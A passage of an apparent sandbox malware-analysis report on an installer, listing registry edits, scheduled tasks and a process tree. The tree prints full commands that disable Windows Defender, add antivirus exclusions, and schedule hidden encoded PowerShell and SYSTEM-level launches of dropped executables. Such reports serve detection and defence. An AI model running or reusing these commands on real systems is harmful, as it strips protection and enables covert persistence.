| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2B03BFA5-82C6-4210-889A-66CABE6EB73A}\WpadNetworkName = "Network 3" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66\WpadDecisionReason = "1" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66\WpadDecisionReason = "1" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00ef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2B03BFA5-82C6-4210-889A-66CABE6EB73A}\WpadDecision = "0" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66\WpadDecision = "0" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66\WpadDetectedUrl | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2B03BFA5-82C6-4210-889A-66CABE6EB73A}\62-cb-57-1c-e0-66 | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2B03BFA5-82C6-4210-889A-66CABE6EB73A}\62-cb-57-1c-e0-66 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\ozHEhQn.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\SysWOW64\wscript.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gRHhxiFFr" /SC once /ST 04:54:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gRHhxiFFr"
C:\Windows\system32\taskeng.exe
taskeng.exe {7D34B106-08A5-4AD5-9113-C61ED26F356E} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gRHhxiFFr"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe\" sw /site_id 525403 /S" /V1 /F
C:\Windows\system32\taskeng.exe
taskeng.exe {C3239438-D568-46DE-97FB-C5CB43838BE5} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe
C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe sw /site_id 525403 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gJVfVvJfC" /SC once /ST 00:03:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gJVfVvJfC"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gJVfVvJfC"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggTNFSVhS" /SC once /ST 00:02:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggTNFSVhS"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggTNFSVhS"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\cmhOiYys\dWuMemSkgQhOHvSI.wsf"
C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\cmhOiYys\dWuMemSkgQhOHvSI.wsf"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
